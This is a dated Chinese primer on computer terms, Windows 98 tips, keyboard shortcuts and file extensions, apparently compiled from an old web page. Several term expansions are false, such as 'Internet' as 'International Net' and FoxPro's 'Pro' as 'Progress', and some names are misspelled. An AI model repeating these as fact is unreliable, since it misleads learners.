   Oracle:英文含义为“聪明人、贤人、哲人”，电脑英语中指美国Oracle公司开发的大型高性能关系型数据库系统软件，在众多的数据库系统中，如IBM公司的DB2数据库、Sybase公司的Sybase数据库等，唯有Oracle数据库系统，以其卓越稳定的性能，可靠的安全保障，强大的联网能力，丰富快捷的开发工具得到广泛的赞誉。因此，它一直占全球数据库销售额的40％以上，稳居数据库产业龙头地位，在众多的评比中几乎获得所有大奖，被美国最著名的计算机评论杂志《PC MAGAZINE》誉为“数据库行业的巨无霸”。在中国，Oracle数据库也伴随着我国计算机技术的发展，得到广泛应用和推广。
   PCTools：Personal Computer Tools，个人电脑工具。它是美国Central Point Software公司出口的一种电脑维护工具，集文件管理和磁盘管理为一体，精简和增强了常规应用程序，是一组多功能实用工具软件。使用PCTools可以取代DOS的许多命令，比起DOS来，其操作更加容易、直观、简便，是电脑这好者的常用工具软件。
   NU：是Norton Untilities的缩写，Norton是著名的计算机专家诺顿，Utility英文意思为“实用工具”，在这里是指Norton先生为解决DOS系统存在的问题而编写的个人计算机工具软件。用它的复数形式可以看成是个人电脑工具软件集。NU是在PCTools之后功能强大、受人喜爱的电脑维护工具。普通用户可利用NU中最著名的工具NDD(Norton Disk Doctor诺顿磁盘医生)，解决大部分磁盘问题；专业人员则可利用操作灵活、功能强大的DiskEdit(磁盘编辑)工具解决专业数据维护问题。
   CSC：Clever Software Corporation，“聪明的软件公司”。这是由北京科利华教育软件公司开发的一套电脑家教软件。

计算机英语名词简释4
---著名的计算机语言

四、著名的计算机语言
  VF：也写作VFP，Visual FoxPro的缩写，Visual在英语中意为“可视的”，Fox意为“狐狸”，原指美国狐狸数据库软件公司，该公司已被微软公司收购。Pro为Progress的略写，意为“更进一层”。Visual FoxPro是由Microsoft在FoxPro的基础上推出的功能强大、可视化、面向对象的数据库编程语言，同时它也是一种强大的数据库管理系统。
  VC：Visual C＋＋，微软公司高级可视化计算机程序开发语言。C语言被人们称为近十年来对计算机程序设计最大的贡献之一。它有高级语言简单易用的特性，又可以完成汇编语言才能做的许多工作。因此，C语言特别适合用来编写各种复杂软件。如果说BASIC语言是初学者和业余爱好者的编程语言的话，那么C语言就是专业人员的编程语言了。
  VB：Visual Basic的缩写，微软公司高级可视化计算机程序开发语言。BASIC是Beginner’s All－purpose Sybolic Instruction Code(初学者通用符号指令代码)的缩写，从BASIC开始相继推出了Quick BASIC、Ture BASIC等，目前最新的是Microsoft公司推出的Visual Basic。这是一种功能极强的面向对象的可视化程序设计语言。
  Delphi：读音／′delfai／，特尔斐，古希腊城市名，被古希腊人当成世界的中心，因有阿波罗神殿而出名。在电脑英语中指美国宝兰(Borland)公司的一种可视化、面向对象、事件驱动的电脑编程语言。
  Java：《新英汉字典》译注为“爪哇岛(属印度尼西亚)、爪哇咖啡”。电脑英语指由美国太阳(Sun)公司推出的新型面向对象程序设计语言。Java集面向对象、平台无关性、稳固性、安全性、多线程等诸多特性于一体，增加了异常处理、网络编程等方面的功能，特别适合于Internet应用的开发，是实现“一个世界，一个网络”构想的关键。用Java编写的各类软件能真正做到“Write Once,Run anywhere(一次写成，到处运行)”，也就是说，相同的软件可在不同计算机上运行，无论是PC机、苹果机、UNIX计算机、还是顶置盒、PDA(个人数据助理)乃至智能元器件无一例外。
  SQL：Structure Query Language，结构化查询语言。SQL是关系数据库管理系统中的一种简明扼要、面向集合的语言，它对一个或多个数据表进行查询，产生一个结果数据表。

计算机英语名词简释5
---常见的重要电脑英语及其缩写

五、常见的重要电脑英语及其缩写
   PC：Personal Computer，个人计算机、个人电脑，又称微型计算机或微机。
   NC: Network Computer，网络计算机。
   MPC: Multimedia Personal Computer，多媒体个人电脑。
   MMX: 是MultiMedia eXtensions(多媒体扩展)的缩写，是第六代CPU芯片的重要特点。
   MMX技术是在CPU中加入了特地为视频信号(Video Signal)，音频信号(Audio Signal)以及图像处理(Graphical Manipulation)而设计的57条指令，因此，MMX CPU极大地提高了电脑的多媒体(如立体声、视频、三维动画等)处理功能。
   Intel Pentium 166MHz MMXTM: Intel Pentium是英特尔(Intel)公司生产的“奔腾”CPU。意为“Registered”(注册商标)。
   166MHz指CPU时钟频率，MHz即Mega Hertz的缩写。MMXTM中的TM是“Trade Mark”的简写，意为“注册商标”。
   OOP: Object Oriented Programming,面向对象的程序设计。
   所谓“对象”就是一个或一组数据以及处理这些数据的方法和过程的集合。面向对象的程序设计完全不同于传统的面向过程程序设计，它大大地降低了软件开发的难度，使编程就像搭积木一样简单，是当今电脑编程的一股势不可挡的潮流。
   28VGA: 28是指彩色显示器上的黄光网点间距(点距)，点距越小的显示器，图像就越细腻、越好，这是因为彩色屏幕上的每个像点都是由一组红、绿、蓝光汇聚而成的，由于在技术上三束光还不能100％地汇聚在一点上，因此会产生一种黄光网点的间隔，这种间隔越小，屏幕上显示的图像越清晰。VGA是Video Graphics Array(视频图形阵列)的缩写。
   FAT：Allocation Table,文件分配表，它的作用是记录硬盘中有关文件如何被分散存储在不同扇区的信息。
   EPA：Environmental Protection Agency的简称，美国环境保护署。
   EPA于1992年宣布了“能源之星”(Energy Star)计划，并得到了国际社会的积极响应。只要启动电脑，过不了几秒钟就能见到屏幕上出现“能源之星”的标志。能源之星的目标是当电脑系统的各个部件不活动时自动进入低功耗状态，当部件的能动性恢复(即当键盘、鼠标等被使用)时，电脑系统自动回到完全清醒的状态。对于符合能源之星规范的产品，EPA将发给能源之星标志“EPA POLLUTION PREVENTER”，意为“美国环境保护署认可的防污染的节能产品”。
   IC卡：Intelligent Card,智能卡。
   ATX：一种新的电脑机箱、主板、电源的结构规范。
   IDE：集成电路设备或智能磁盘设备。
   DLL：Dynamic Link Library,动态链接库。
   KB：Kilo Byte，KB表示千字节。
   K=Kilo，构词成分，表示“千；千米；公斤；公里”。B=Byte，意为“字节”，是电脑中最小存贮单位(一个字节可以存贮一个英文字母，每两个字节可以存放一个汉字)。
   MB：Mega Byte，MB表示兆字节。
   M=Mega，构词成分，表示“兆；百万”。
   GB：Giga Byte,GB表示千兆字节。
   G=Giga，构词成分，表示千兆；十亿”。
   CAI：Computer－Asisted Instruction或Computer－Aided Instruction,计算机辅助教学。它将是二十一世纪最重要、最受欢迎的教学手段。
   CAD：Computer－Aided Design，计算机辅助设计。
   ISO：International Standard Organization,国际标准化组织。
   ISO于1987年推出有关质量管理和质量保证的ISO 9000系列国际标准，于1994年又发布了经过修订的标准。其中，构成ISO 9000系列标准的主要标准分别是：1.ISO 9000－1:1994《质量管理和质量保证标准—第一部分：选择和使用指南》。2.ISO 9001:1994《质量体系—设计、开发、生产、安装和服务的质量保证模式》。3.ISO 9002:1994《质量体系—最终检验和试验的质量保证模式》。
   3DS或3D Studio: Three Dimension Studio,三维摄影室。
   是美国Autodesk公司推出的一套多功能三维动画软件，集实体造型、静态着色和动画创作于一体，极大地普及了三维造型技术。它能够与AutoCAD进行图形信息交换，利用扫描仪输入图形，通过VGA与电视转换接口将动画输出至电视或录像带。
   VR：Virtual Reality，虚拟现实，又称投入3D，由空军模拟飞行装置演变而来，基本上是利用左、右视觉空间交替变换显示图像的原理产生立体效果，实际上已超出图像处理的范畴，是综合光、声、图像的计算机生成环境，人们能够像在实际生活中那样对虚拟环境中的对象进行交互式操作，虚拟现实应用前景极为广阔。
   OCR：Optical Character Recognition(光学字符识别)的缩写，是指将文字材料通过扫描仪输入作为计算机图像文件，通过软件识别为中文或英文内码，然后进行文字处理。由于手写体的随意性太大，目前OCR主要限于印刷文字的识别。目前代表中文OCR识别准确率最高水平的是清华文通公司出品的TH－OCR NT for Windows。
   SCSI：Small Computer System Interface,小型计算机系统接口，它是为解决众多的外部设备与计算机之间的连接问题而出现的。
   OEM：Original Equipment Manufacturer,原始设备制造商。
   Microsoft OEM: 微软OEM产品。它是指预安装在微机上的软件操作系统，包括Windows98、Windows NT、WorkStation、Windows3.X、MS－DOS。
   MIS：Management Information System,管理信息系统。它广泛地应用于各行各业，国内最有名的管理信息系统有“王特MIS”、“雅奇MIS”、“Quick MIS”。
   PNP：Plug and Play，即插即用，它是Window98的一个重要技术特性。所谓即插即用是指将符合PNP标准的PC插卡等外围设备安装到电脑时，操作系统自动设定系统结构的技术。这就是说，当用户安装新的硬件时，不必再设置任何跳线器开关，也不必用软件配置中断请求(IRQ)、内存地址或直接存储器存取(DMA)通道，Windows98会向应用程序通知硬件设备的新变化，并会自动协调IRQ、内存地址和DMA通道之间的冲突。
   OLE：Object Linking and Embedding,对象连接与嵌入，简称OLE技术。OLE不仅是桌面应用程序集成，而且还定义和实现了一种允许应用程序作为软件“对象”(数据集合和操作数据的函数)彼此进行“连接”的机制，这种连接机制和协议称为部件对象模型(Component Object Model),简称COM。OLE可以用来创建复合文档，复合文档包含了创建于不同源应用程序，有着不同类型的数据，因此它可以把文字、声音、图像、表格等组合在一起。
   MIDI：Musical Instrument Digital Interface,乐器数字接口。它是多媒体的基本术语之一，MIDI文件是用电子乐器如：电子琴、吉它、萨克斯等演奏并录制下来的，它能在大多数的多媒体计算机声音卡上播放，即使不去创建自己的MIDI文件，也可以使用现有的MIDI文件，作为多媒体演示的背景音乐。MIDI文件储存的只是对声音的描述，依靠声音卡的合成器(FM或者波形表)来产生人们想听的真实声音。
   MPEG：是Motion Picture Experts Group的缩写，意即“运动图像专家组”，它是多媒体计算机中的一种活动图像及其伴音的压缩编码标准，即人们通常所说的MPEG标准。它包括三部分：MPEG音频、MPEG视频、和MPEG系统。

计算机英语名词简释6
---网络英语

六、网络英语
   Internet: 为International Net的简写，因特网，又称国际互联网。它最早产生于美国国防部的高级研究规划署，那是1969年的事了，最初的目的也只是远程计算机的数据共享，后来发展成将世界各地的计算机及计算机网络相互连接起来，形成了一个无边无际的超级大网。Internet的主要服务项目有：电子邮件(E－mail)，远程登录(Telnet)，查询服务(Finger)，文件传输(FTP)，文档服务器(Archive)，新闻论坛(Usenet)，电子公告牌(BBS)，新闻群组(News Group)，全球网(World Wide Web，缩写为WWW，又称万维网)等。
   BBS：Bulletin Board System，公告牌系统或电子公告板，又称Public Access Message System,公共访问信息系统。它是普通公告的电子版本，用户可以通过公告牌发布消息，任何用户都可以读取公告牌上的消息，也可以给某一特定的人或一组用户发送信息。公告牌系统被广泛地用于传播信息，咨询一个电子公告牌往往比使用交互信箱或公共邮政系统发送公告更加快捷、有效。
   E－mail: 电子邮件，这是一种利用Internet网交换文字信息的交互式服务，全世界Internet用户可以互相发送和接收电子邮件。
   WWW: World Wide Web的缩写，全球网，又称万维网。它是一个基于超文本方式的信息检索工具，提供一种友好的信息查询接口，是目前最受欢迎同时也是最先进的Internet检索工具之一。
   Remote Login: 远程登录(注册)，它是在网络环境下实现资源共享的一种重要手段，采用这种方式，用户可连接到世界任何一台Internet主机。
   HTTP: Hyper Text Transmission Protocol,超文本传输协议。
   IP：IP国际互联网协议，即网际协议。
   FTP：是 Transfer Protocol的缩写，即文件传输协议，用于在Internet上传输文件。FTP的任务是从一台计算机将文件传送到另一台计算机。人们通过FTP可以获得很多免费的实用软件。
   Gopher: 英文意为“地鼠”；(美国南部穴居的)可食用的龟。它是Internet中基于菜单驱动的信息查询软件，可将用户的请求自动转换成FTP(文件传输协议)或Telnet(用于远程终端连接的标准IP协议)命令，在菜单的引导下，用户可对Internet上远程信息系统进行访问。
   Archive: “档案；档案馆”之意。Internet中的文档服务器，可定期自动地访问众多的Internet FTP服务器，将这些服务器上的文件索引成一个可以检索的数据库。
   WAIS：是Wide Area Information Service的简写，广域信息服务器。它使得Internet上巨大的数据资源变得易于检索，并且可以获得远程数据库的信息。
   Luisitserv: 这是Internet上流行的用户之间交流信息的方式。
   IRC：Internet Relay Chat,互联网接力聊天。这是一种多用户聊天设施，允许多个用户通过文字实时地与其它人聊天。
   Hypertext: 超文本。本来用做表示所有超链接，也表示包含“链接”的文本。这是一种非线性的信息组织方法，文字、图形和其它数据做为单个元素都能够指向(链接)其它元素。
   Hyperlink: 超链接。一种与其它文件的“链接”，文件中图片、按钮、“热词”或短语都可以做为超链接，当用户选择超链接之后，所连接的信息就会显示出来。
   HTML: Hyper Text Markup Language,超文本标示语言。它是由欧洲粒子实验室一名想象力丰富的研究员Tim Bemers Lee发明的，是“WWW(全球网)世界”的通用语言。“WWW世界”的诸服务器与客户浏览器间，通过它互相沟通；信息资源也是由它描述而“表现”的，HTML可以描述主页(Home Page)和静态的文本。全世界有几千万人在使用HTML语言，可以毫不夸张地说，没有HTML就没有“WWW世界”。
   Hypermedia: 超媒体。一种以计算机为基础的利用文字、图形、动画、声音和视频传送和显示信息的方法。这些文字等超媒体的组成元素既可以与其它文件连接，又可以做为单个对象处理。
   Navigator: 是美国网景(Netscape)公司出品的Internet浏览器软件之一。Navigator的英文意思是“航海者、海上探险者”，寓意人们可以使用该软件在Internet网络的海洋中航行、探险。Navigator不仅可以浏览万维网(WWW)，还具有电子邮件(E－mail)、文件传输(FTP)、远程登录(Telnet)及新闻组(News Group)、信息浏览(Gopher)等多种功能。
   IE：Internet Explorer,Explorer意为“探险者”。


家用电脑基本知识

《一键清理系统垃圾》

家用电脑基本知识

   家用电脑和办公、商用电脑相比，主要区别在家用电脑更注重音乐、图像、视频、游戏等娱乐功能。硬件系统也由输入设备、主机和输出设备组成。基本部件有：
   CPU：CPU即中央处理器，是电脑的核心，电脑处理数据的能力和速度主要取决于CPU。通常用主频评价CPU的能力和速度，如PⅢ800　CPU，表示主频为800MHz。
   主板：也称主机板，是安装在主机机箱内的一块矩形电路板，上面安装有电脑的主要电路系统。主板的类型和档次决定着整个微机系统的类型和档次，主板的性能影响着整个微机系统的性能。主板上安装有控制芯片组、BIOS芯片和各种输入输出接口、键盘和面板控制开关接口、指示灯插接件、扩充插槽及直流电源供电接插件等元件。CPU、内存条插接在主板的相应插槽中，驱动器、电源等硬件连接在主板上。主板上的接口扩充插槽用于插接各种接口卡，这些接口卡扩展了电脑的功能。
   常见接口卡有显示卡、声卡等。
   光盘驱动器：读取光盘信息的设备。是多媒体电脑不可缺少的硬件配置。光盘存储容量大，价格便宜，保存时间长，适宜保存大量的数据，如声音、图像、动画、视频信息、电影等多媒体信息。光盘驱动器主要有三种，CD—ROM、CD—R和CD—RW，CD—ROM是只读光盘驱动器；CD—R只能写入一次，以后不能改写；CD—R　W　是可写、可读光盘驱动器。目前一些高档机型已配置DVD驱动器。DVD盘片的容量为4.7GB，相当于CD—ROM光盘的7倍。DVD盘片可分为：DVD—ROM、DVD—R（可一次写入）、DVD—RAM（可多次写入）和DVD—RW（读和重写）。
   内存储器：简称内存，用于存放当前待处理的信息和常用信息的半导体芯片。内存的最大特点是关机或断电数据便会丢失。按内存条与主板的连接方式有30线、72线和168线之分。目前装机常用168线、刷新时间为10ns、容量为64M或128M的SDRAM内存条。内存越大的电脑，能同时处理的信息量越大。
   显示卡：又称显示器适配卡，是连接主机与显示器的接口卡。其作用是将主机的输出信息转换成字符、图形和颜色等信息，传送到显示器上显示。显示卡插在主板的ISA、PCI、AGP扩展插槽中，ISA显示卡现已基本淘汰。
   声卡：多媒体电脑中用来处理声音的接口卡。声卡可以把来自话筒、收录音机、激光唱机等设备的语音、音乐等声音变成数字信号交给电脑处理，并以文件形式存盘，还可以把数字信号还原成为真实的声音输出。声卡尾部的接口从机箱后侧伸出，上面有连接麦克风、音箱、游戏杆和MIDI设备的接口。


快捷关闭和重启电脑

《一键清理系统垃圾》

快捷关闭和重启电脑

   平常我们关闭电脑或重新启动电脑时，需要在“开始”菜单的“关闭系统”中进行选择，显得有些繁琐，依如下方法操作可实现点一下鼠标便关闭电脑。
   在Windows 98桌面上点击鼠标右键选择“新建/快捷方式”，然后在命令行中输入“C：\WINDOWS\RUNDLL.EXE USER.EXE，EXITWINDOWS”。最后在“快捷方式名称”输入“关闭电脑”（当然也可以是别的名字，比如close）按下“完成”按钮。
   这样只要在桌面上用鼠标双击这个快捷方式就可以关闭电脑了。
   同样，也可实现点鼠标重新启动电脑，操作方法基本同上，只是在命令行中输入的命令和输入快捷方式的名称不同，这次需要在命令行中输入“C:\WINDOWS\RUNDLL.EXE USER.EXE,EXITWINDOWSEXEC”，在“快捷方式名称”中输入“重新启动电脑”即可。
   需要注意的是，在命令行中输入命令时，在RUNDLL.EXE和USER.EXE之间需用空格间隔开。


快捷键全面掌控你的Windows系统

《一键清理系统垃圾》

快捷键全面掌控你的Windows系统

   Windows给我们提供了很多的快捷键，但普通电脑使用者只熟悉和经常使用其中的一小部分，还有很多也非常实用的快捷键并不被人们所熟知，下面笔者就向大家介绍一下这些快捷键。

一、F键
   F1 打开Windows帮助。
   F2 重新命名所选项目。
   F3 搜索文件或文件夹。
   F5 刷新当前窗口。
   F6 在窗口或桌面上循环切换屏幕元素。
   F10 激活当前程序中的菜单条。

二、Shift键
  Shift + Delete 永久删除所选项目，而不把它放到“回收站”中。
  Shift + F10 显示所选项的快捷菜单。

三、Ctrl键
   对于和Ctrl键搭配的快捷键，大家一定熟悉Ctrl + C复制、Ctrl + X剪切、Ctrl + V粘贴、Ctrl + Z撤消、Ctrl + A选中全部内容这些很常用的组合，其他还有下面一些。
   Ctrl + F4 在允许同时打开多个文档的程序（比如Word）中关闭当前文档。
   Ctrl + Esc 显示“开始”菜单。
   Ctrl + 向右键 将插入点移动到下一个单词的起始处。
   Ctrl + 向左键 将插入点移动到前一个单词的起始处。
   Ctrl + 向下键 将插入点移动到下一段落的起始处。
   Ctrl + 向上键 将插入点移动到前一段落的起始处。
   以上几个组合在进行文档编辑时很有用。

四、Alt键
   Alt + Enter 显示所选对象的属性或在DOS模式下进行窗口或全屏显示切换。
   Alt + F4 关闭当前项目或者退出当前程序。
   Alt +空格键 为当前窗口打开快捷菜单。
   Alt + Tab 在打开的项目之间切换。
   Alt + Esc 以项目打开的顺序循环切换。

五、微软徽标键
  徽标键显示或隐藏“开始”菜单。
   徽标键+ Break 显示“系统属性”对话框。
   徽标键+ D 显示桌面。
   徽标键+ M 最小化所有窗口。
   徽标键+ E 打开“我的电脑”。
   徽标键+ F 搜索文件或文件夹。
   徽标键+ R 打开“运行”对话框。
   徽标键+ U 打开“工具管理器”。

六、应用程序键
   应用程序键位于键盘右侧微软徽标键与右Ctrl之间，是一个很容易被忽略的键，它最大的作用就是相当于鼠标右键，按下它可快速显示所选项的快捷菜单。


扩展名全解

《一键清理系统垃圾》

扩展名全解

A 对象代码库文件
AAM Authorware shocked文件
AAS Authorware shocked包
ABF Adobe二进制屏幕字体
ABK CorelDRAW自动备份文件
ABS 该类文件有时用于指示一个摘要（就像在一篇有关科学方面的文章的一个摘要或概要，取自abstract）
ACE Ace压缩档案格式
ACL CorelDRAW 6键盘快捷键文件
ACM Windows系统目录文件
ACP Microsoft office助手预览文件
ACR 美国放射医学大学文件格式
ACT Microsoft office助手文件
ACV OS/2的驱动程序，用于压缩或解压缩音频数据
AD After Dark屏幕保护程序
ADA Ada源文件（非-GNAT）
ADB Ada源文件主体（GNAT）；HP100LX组织者的约定数据库
ADD OS/2用于引导过程的适配器驱动程序
ADF Amiga磁盘文件
ADI AutoCAD设备无关二进制绘图仪格式
ADM After Dark多模块屏幕保护；Windows NT策略模板
ADP FaxWork用于传真调制解调器的交互安装文件；Astound Dynamite文件
ADR After Dark随机屏幕保护；Smart Address的地址簿
ADS Ada源文件说明书（GNAT）
AFM Adobe的字体尺度
AF2，AF3 ABC的FlowChat文件
AI Adobe Illustrator格式图形
AIF，AIFF 音频互交换文件，Silicon Graphic and Macintosh应用程序的声音格式
AIFC 压缩AIF
AIM AOL即时信息传送
AIS ACDSee图形序列文件；Velvet Studio设备文件
AKW RoboHELP的帮助工程中所有A-关键词
ALAW 欧洲电话音频格式
ALB JASC Image Commander相册
ALL 艺术与书信库
AMS Velvet Studio音乐模块（MOD）文件；Extreme的Tracker模块文件
ANC Canon Computer的调色板文件，包含一系列可选的颜色板
ANI Windows系统中的动画光标
ANS ANSI文本文件
ANT SimAnt For Windows中保存的游戏文件
API Adobe Acrobat使用的应用程序设计接口文件
APR Lotus Approach 97文件
APS Microsoft Visual C++文件
ARC LH ARC的压缩档案文件
ARI Aristotle声音文件
ARJ Robert Jung ARJ压缩包文件
ART Xara Studio绘画文件；Canon Crayola美术文件；Clip Art文件格式；另一种光线跟踪格式；AOL使用的用Johnson-Grace压缩算法压缩的标记文件
ASA Microsoft Visual InterDev文件
ASC ASCⅡ文本文件；PGP算法加密文件
ASD Microsoft Word的自动保存文件；Microsoft高级流媒体格式（microsoft advanced streaming format，ASF）的描述文件；可用NSREX打开 Velvet Studio例子文件
ASE Velvet Studio采样文件
ASF Microsoft高级流媒体格式文件
ASM 汇编语言源文件，Pro/E装配文件
ASO Astound Dynamite对象文件
ASP 动态网页文件；ProComm Plus安装与连接脚本文件；Astound介绍文件
AST Astound多媒体文件；ClarisWorks"助手"文件
ASV DataCAD自动保存文件
ASX Cheyenne备份脚本文件；Microsoft高级流媒体重定向器文件，视频文件
ATT AT< Group 4位图文件
ATW 来自个人软件的Any Time Deluxe For Windows个人信息管理员文件
AU Sun/NeXT/DEC/UNIX声音文件；音频U-Law（读作"mu-law"）文件格式
AVB Computer Associates Inoculan反病毒软件的病毒感染后文件
AVI Microsoft Audio Video Interleave电影格式
AVR Audio Visual Research文件格式
AVS 应用程序可视化格式
AWD FaxVien文档
AWR Telsis数字储存音频文件扩展名格式
Axx ARJ压缩文件的分包序号文件，用于将一个大文件压至几个小的压缩包中（xx取01-99的数字）
A3L Authorware 3.x库文件
A4L Authorware 4.x库文件
A5L Authorware 5.x库文件
A3M，A4M Authorware Macintosh未打包文件
A4P Authorware无运行时间的打包文件
A3W，A4W，A5W 未打包的Authorware Windows文件
BAK 备份文件
BAS BASIC源文件
BAT 批处理文件
BDF West Point Bridger Designer文件
BFC Windows 95 Briefcase文档
BG Backgammon For Windows下的游戏文件
BGL Microsoft Flight Simulator（微软飞行模拟器）的视景文件
BI 二进制文件
BIF Group Wise的初始化文件
BIFF XLIFE 3D格式文件
BIN 二进制文件
BK，BK$ 有时用于代表备份版本
BKS IBM BookManager Read书架文件
BMK 书签文件
BMP Windows或OS/2位图文件
BMI Apogee BioMenace数据文件
BOOK Adobe FrameMaker Book文件
BOX Lotus Notes的邮箱文件
BPL Borlard Delph 4打包库
BQY BrioQuery文件
BRX 用于查看多媒体对象目录的文件
BSC MS Developer Studio浏览器信息文件
BSP Quake图形文件
BS1 Apogee Blake Stone数据文件
BS_ Microsoft Bookshelf Find菜单外壳扩展名
BTM Norton 应用程序使用的批处理文件
BUD Quicken的备份磁盘
BUN CakeWalk 声音捆绑文件(一种MIDI程序)
BW SGI黑白图像文件
BWV 商业波形文件
BYU BYU的电影文件格式
B4 Helix Nuts and Bolts文件
C C代码文件
C0l 台风波形文件
CAB Microsoft压缩档案文件
CAD Softdek的Drafix CAD文件
CAL CALS压缩位图；日历计划表数据
CAM Casio照相机格式
CAP 压缩音乐文件格式
CAS 逗号分开的ASCⅡ文件
CAT Quicken使用 的IntellCharge分类文件
CB Microsoft干净引导文件
CBI 二进制卷格式文件(用于IBM大型机系统)
CC Visual dBASE用户自定义类文件
CCA cc：邮件文件
CCB Visual Basic动态按钮配置文件
CCF 多媒体查看器配置文件，用于OS/2
CCH Corel图表文件
CCM Lotus cc：邮箱（例如"INBOX.CCM"）
CCO CyberChat数据文件
CCT Macromedia Director Shockwave投影
CDA CD音频轨道
CDF Microsoft频道定义格式文件
CDI Philip的高密盘交互格式
CDM Visual dBASE自定义数据模块文件
CDR CorelDRAW绘图文件；原始音频CD数据文件
CDT CorelDRAW模板
CDX CorelDRAW压缩绘图文件；Microsoft Visual FoxPro索引文件
CEL CIMFast事件语言文件
CER 证书文件（MIME x-x509-ca-cert）
CFB Compton的多媒文件
CFG 配置文件
CFM CotdFusion模板文件；Visual dBASE Windows用户定制表单
CGI 公共网关接口脚本文件
CGM 计算机图形元文件
CH OS/2配置文件
CHK 由Windows磁盘碎片整理器或磁盘扫描保存的文件碎片
CHM 编译过的HTML文件
CHR 字符集（字体文件）
CHP Ventura Publisher章节文件
CHT ChartViem文件；Harvard Graphics矢量文件
CIF Adaptec CD创建器 CD映像文件
CIL Clip Gallery下载包
CIM SimCity 2000文件
CIN OS/2改变控制文件用于跟踪INI文件中的变化
CK1 iD/Apogee Commander Keen 1数据文件
CK2 iD/Apogee Commander Keen 2数据文件
CK3 iD/Apogee Commander Keen 3数据文件
CK4 iD /Apogee Commander Keen 4数据文件
CK5 iD /Apogee Commander Keen 5数据文件
CK6 iD /Apogee Commander Keen 6数据文件
CLASS Java类文件
CLL Crick Software Clicker文件
CLP Windows 剪贴板文件
CLS Visual Basic类文件
CMD Windows NT，OS/2的命令文件；DOS CD/M命令文件；dBASEⅡ程序文件
CMF Corel元文件
CMG Chessmaster保存的游戏文件
CMP JPEG位图文件；地址文档
CMV Corel Move动画文件
CMX Corel Presentation Exchange图像
CNF Telnet，Windows和其他其内格式会发生改变的应用程序使用的配置文件
CNM Windows应用程序菜单选项和安装文件
CNQ Compuworks Design Shop文件
CNT Windows（或其他）系统用于帮助索引或其他目的内容文件
COB TrueSpace 2对象文件
COD Microsoft C编译器产生的可显示机器码/汇编代码文件，其中附有源C代码作为注释
COM 命令文件（程序）
CPD Corel Print Office文件（图形）
CPD，CPE 传真覆盖文档
CPI Microsoft MS-DOS代码页信息文件
CPL 控制面板扩展名，Corel颜色板
CPO Corel打印存储文件
CPP C++代码文件
CPR Corel提供说明书文件
CPT Corel 照片-绘画图像
CPX Corel Presentation Exchange压缩图形文件
CRD Windows Cardfile文件
CRP Corel 提供的运行时介绍文件；Visual dBASE自定义报表文件
CRT 认证文件
CSC Corel脚本文件
CSP PC Emcee On_Screen图像
CSS 瀑布式表格文件
CST Macromedia Director Cast文件
CSV 逗号分隔的值文件
CT Scitex CT位图文件；Paint Shop Pro Grapic编辑器文件
CTL 通常用于表示一个包含控件信息的文件；FaxWork用它来保持有关每个传真收到或发出的信息
CUE Microsoft提示牌数据文件
CUR Windows光标文件
CUT Dr Halo位图文件
CV Corel版本的档案文件；Microsoft CodeView信息屏幕文件
CWK ClarisWorks数据文件.
CWS ClarisWorks模块
CXT Macromedia Director受保护的（不可编辑的）投影文件
CXX C++源代码文件
DAT 数据文件；WrodPerfect合并数据文件；用于一些MPEG格式的文件
DB Borland的Paradox 7表
DBC Microsoft Visual FoxPro数据库容器文件
DBF dBASE文件，一种由Ashton-Tate创建的格式，可以被ACT！、Lipper、FoxPro、Arago、Wordtech、Xbase和类似数据库或与数据库有关产品识别；可用数据文件（能被Excel 97打开）；Oracle 8.1.x表格空间文件
DBX DataBearn图像；Microsoft Visual FoxPro表格文件
DCM DCM模块格式文件
DCR 冲击波文件
DCS 桌面颜色分隔文件
DCT Microsoft Visual FoxPro数据库容器
DCU Delphi编译单元文件
DCX Microsoft Visual FoxPro数据库容器；基于PCX的传真图像；宏
DC5 DataCAD绘图文件
DDF Btrieve或Xtrieve数据定义文件，它包含用于描述Btrieve或Xtrieve文件的元数据
DDIF Digital Equipment或 Compaq格式，用于保存他们图像与字处理文档
DEF SmartWareⅡ数据文件；C++模块定义文件
DEFI Oracle 7 卸载脚本文件
DEM 用于表示数字高度模型的USGS基准的文件
DER 认证文件
DEWF Macintosh Sound Cap/Sound Edit录音设备格式
DGN Macintosh 95 CAD绘图文件
DIB 设备无关位图
DIC 目录
DIF 可进行数据互换的电子表格
DIG DigiLink格式；Sound DesignerⅠ音频文件
DIR MacromediaDirector文件
DIZ 描述文件
DLG C++对话框脚本文件
DLL 动态链接库
DLS 可下载声音文件
DMD Visual dBASE数据模块文件
DMF X-Trakker音乐模块（MOD）文件
DOC FrameMaker或FrameBuilder文档；Word Star文档、Word Perfect文档、Microsoft Word文档；DisplayWrite文档
DOT Microsoft Word文档模板
DPL Borland Delph3压缩库
DPR Borland Delphi工程头文件
DRAW Acorn的基于对象的矢量图像文件
DRV 驱动程序
DRW Micrografx Designer/Draw；Pro/E绘画文件
DSF Micrografx Designer VFX文件
DSG DOOM保存的文件
DSM Dynamic Studio音乐模块（MOD）文件
DSP Microsoft Developer Studio工程文件
DSQ Corel QUERY（查询）文件
DST 刺绣机图形文件
DSW Microsoft Developer Studio工作区文件
DTA Word Bank（世界银行）的STARS数据文件
DTD SGML文档类型定义（DTD）文件
DTED 地面高度数字数据（图形的数据格式）文件
DTF Symantec Q&A相关的数据库数据文件
DTM DigiTrakker模块文件
DUN Microsoft拔号网络导出文件
DV 数字视频文件（MIME）
DWD DiamondWare数字化文件
DWG AutoCAD工程图文件；AutoCAD或Generic CADD老版本的绘图格式
DXF 可进行互交换的绘图文件格式，二进制的DWG格式的文本表示；数据交换文件
DXR Macromedia Director受保护（不可编辑）电影文件
D64 Commodore的64位模拟磁盘图像文件
EDA Ensoniq ASR磁盘映像
EDD 元素定义文档（FrameMaker+SGML文档）
EDE Ensoniq EPS磁盘映像
EDK Ensoniq KT磁盘映像
EDQ Ensoniq SQ1/SQ2/Ks32磁盘映像
EDS Ensoniq SQ80磁盘映像
EDV Ensoniq VFX-SD磁盘映像
EFA Ensoniq ASR文件
EFE Ensoniq EPS文件
EFK Ensoniq KT文件
EFQ Ensoniq SQ1/SQ2/Ks32文件
EFS Ensoniq SQ80文件
EFV Ensoniq VFX-SD文件
EMD ABT扩展模块
EMF Windows增强元文件
EML Microsoft Outlook Express邮件消息（MIME RTC822）文件
ENC 重演文件
ENFF 中性文件格式扩展名
EPHTML Perl解释增强HTML文件
EPS 压缩的PostScript图像
EPSF 压缩的PostScript文件
ERI ERWin文件
ERR 当RobooHELP帮助编译器企图编译一个帮助系统源文件时用来存储错误消息的文件
EPX ERWin文件
ESPS ESPS音频文件
EUI Ensoniq ESP家族的压缩磁盘映像
EVY 特使文档
EWL Microsoft Encarta文档
EXC Microsoft Word禁止字字典
